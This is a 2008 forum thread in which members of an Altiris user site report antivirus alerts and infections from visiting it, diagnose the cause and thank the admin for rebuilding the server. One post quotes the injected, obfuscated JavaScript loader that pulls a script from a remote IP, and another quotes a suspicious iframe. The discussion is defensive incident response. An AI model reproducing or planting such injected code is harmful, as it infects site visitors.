Bloodhound.Exploit.196

Nick · 11-12-2008, 09:44 AM

Welcome to the new server everyone!

I decided that the best approach to fixing this problem was to completely rebuild the server from scratch on a dedicated (VPS) server.

I apologize for the downtime but feel that this was the best course of action.

On a positive note, being on a VPS appears, from my end, to make the site much more responsive.

Please let me know if you experience any issues, or problems and I will work on getting them corrected.

Hi folks,

I have been notified by two separate people that their Antivirus is detecting the Bloodhound.Exploit.196 virus as soon as they hit altirigos.com.

I am curious if anyone else out there is. I am unable to replicate this on several systems (8 so far). I have used IE6, IE7, Opera, Firefox 2, Firefox 3, Chrome and Safari. I have used SAV, SEP, Bitdefender and ClamAV on the systems.

I have also gone through the index code to see if anything is out of place as this is what would be used as soon as the site is viewed... again nothing wrong there.

Just curious if this is isolated to those two individuals that reported it.

Thanks

Moedius · 11-12-2008, 01:13 PM

Saw it yesterday. I left early so I couldnt test it on another PC here to see if it is configuration related, but it doesnt appear to be kicking it up any more.

XP SP2, IE 8, SEP 11 if that helps.

jenifer.arnold · 11-12-2008, 01:27 PM

I didn't visit the site yesterday (go federal holidays!), but this morning I am not seeing anything.

XP SP3, IE7, TrendMicro OfficeScan

vithalmaddala · 11-12-2008, 06:58 PM

Yes it comes up with Bloodhound virus alert when I visit your homepage

ricjam · 11-13-2008, 10:03 AM

Yes, I received it when I came to the site this morning.

XP SP3, IE 7, Symantec Endpoint Protection 11

jlhanlin · 11-13-2008, 11:09 AM

I connected yesterday on one of my machine and today on another one, and both times got virus mesages about InfoStealer. My autoprotect removed it, but it happened to me twice

seamusjg · 11-13-2008, 02:06 PM

I got that notification three times yesterday.

Brandon · 11-13-2008, 03:47 PM

If you look at the CVE's for this it seems to be related to Adobe Reader <8.1.2. I myself checked against both 8.1.2+SU1 and 9.0 with no warnings. I am guessing the people who are getting warnings may be using pre 8.1.2 ???

bsakata · 11-13-2008, 03:57 PM

I was infected on two of my computers so I decided to look into it. Looks like your website drops sysaudio.sys into the c:\windows\system32 folder and adds the registry string key aux=sysaudio.sys in HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32

Symptoms:
Affects results from popular websearches, i.e. google, yahoo, etc. If you do a search, it will inject shady websites in the links of the search results page.

To Remove:
1. delete reg key
2. reboot
3. delete sysaudio.sys

Look at your website code, it has:
<script language=javascript>
if(typeof(yahoo_counter)!=typeof(1))eval(unescape( '/%2F!.%2E~%2E` %3C%64i`v%20s%74`y%6Ce@%3D%64%69#s~%70lay&:n%6F&n% 65%3E\nvar%20&_;`%69f(%64!o%63|%75|m|e`n&t`.|c&%6F %6F@k%69%65|.@ma`%74c&h(`/%5Cb$%68%67%66~%74=1@%2F!%29|%3D!%3Dn|%75&l~%6C|)d `o@cu%6D%65%6E%74`%2Ew@%72`%69`%74@%65("%3Cs|%63|r $%69$%70%74%20%73%72!%63~%3D|%2F/%37|8@.&%31%357#%2E~14$%32%2E#%35`%38/!%63~p/?%22+na%76|%69g`a%74or.a&%70&%70N%61$%6D#%65~%2Ec% 68%61%72A%74(&0!)+%22!%3E%3C%5C`/!s%63r%69p&%74`%3E%22@%29$%3B~\n//%3C&/d~%69v@%3E').replace(/@|~|\!|\$|`|\&|\||#/g,""));var yahoo_counter=1;
</script>

This looks to be the culprit....

Here's more info:
miekiemoes.blogspot com/2008/10/fake-sysaudiosys.causes-searchengine.html

Nick · 11-13-2008, 04:06 PM

Thanks Bsakata.

I saw that script and it is the culprit. I'm trying to figure out how to pull that out of the code but having a devil of a time finding it.

Sorry for the problems. I am working on it as much as I can.

Will keep you posted.

Brandon · 11-13-2008, 04:09 PM

Also, your 404 error pages seem to have an iframe to a commonly blacklisted site:

iframe src="hxxp://searchportal.information.com/?a_id=48873&domainname=referer_detect" frameborder="0" height="600" scrolling="auto" width="100%"></iframe>

I would be suprised if this is legit.

carync · 11-17-2008, 04:17 AM

Yup, my work PC was infected as well. (no notifications, workplace uses worthless McAfee).

Saw the hijacked search results for days without being able to fix it.

Thanks for the update guys.

SLam · 11-18-2008, 05:17 AM

Sometimes the best (and easiest) approach is to start from scratch. Good job!

Nick · 11-18-2008, 05:54 AM

I agree. I was able to track down a couple of minor issues as well and fix them.

I feel the site is now in as good a shape as it has ever been.

If anyone experiences any problems please let me know and I will work on getting them resolved.

dominique · 11-22-2008, 10:56 AM

Thanks for this work Nick and ....

I am no more able to find things on altiris.com... through symantec.com... my old age might be the reason....

Nick · 11-22-2008, 11:05 AM

Thanks Dom. Anything in particular that you're looking for that you can't find?

dominique · 11-22-2008, 12:20 PM

Hey Boss,

For now I was trying my useful link to get the documentation on www.altiris.com but I did not get it... it redirected me to Altiris Products & Services | Symantec Corp. where is the documentation from there?

But

was there with all documentations I needed on the repository

Thanks,

Nick · 11-22-2008, 01:06 PM

Dom,

Give Documentation - Altiris, Inc. a try. I was just able to pull it up with success.

dominique · 11-22-2008, 01:44 PM

Excellent this one one works too... thanks

jsantiago · 11-23-2008, 02:24 PM

Nick,

Despite the reason that prompted the move to the new server.. I wanted to take the chance and say thanks for keeping a site such as Altirigos up and running. Many of us out there appreciate the site and can say that it has served many of us as a wealth and means of finding solutions and collaborating.

Thanks Nick! Thanks Altirigos and the community.

JSantiago.

Nick · 11-24-2008, 01:35 AM

My pleasure J and let me second the thanks to the community.

Every one of the contributors help someone else in need and that is a great thing to watch.

estebs1978 · 12-11-2008, 03:35 PM

Nick,

Thank you for keeping this up man. It is an amazing tool for us and we thank you for it.